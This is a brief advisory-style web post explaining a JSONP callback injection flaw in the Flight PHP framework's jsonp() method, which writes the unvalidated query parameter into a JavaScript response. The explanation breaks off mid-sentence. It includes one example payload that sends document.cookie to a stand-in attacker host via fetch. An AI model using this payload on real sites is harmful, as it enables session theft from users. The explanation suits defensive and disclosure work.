Listen to this Post
How the mentioned CVE works: Flight::jsonp() in flight/Engine.php (lines 1000-1013) directly concatenates the `?jsonp=` query parameter into an `application/javascript` response body without any validation. The code calls `$this->request()->query[$param]` to retrieve the callback name, then writes `$callback . ‘(‘ . $json . ‘);’` via ->write(). No regex check or JavaScript identifier validation is performed. An attacker can supply a malicious value such as ;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//. This string gets embedded directly into the response. The `Content-Type` header is set to application/javascript, so when a victim loads the endpoint via `
To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent may adversely affect certain features and functions.
We do not sell your personal data. If you wish to exercise your rights under applicable privacy laws, please visit our Do Not Sell My Personal Information page.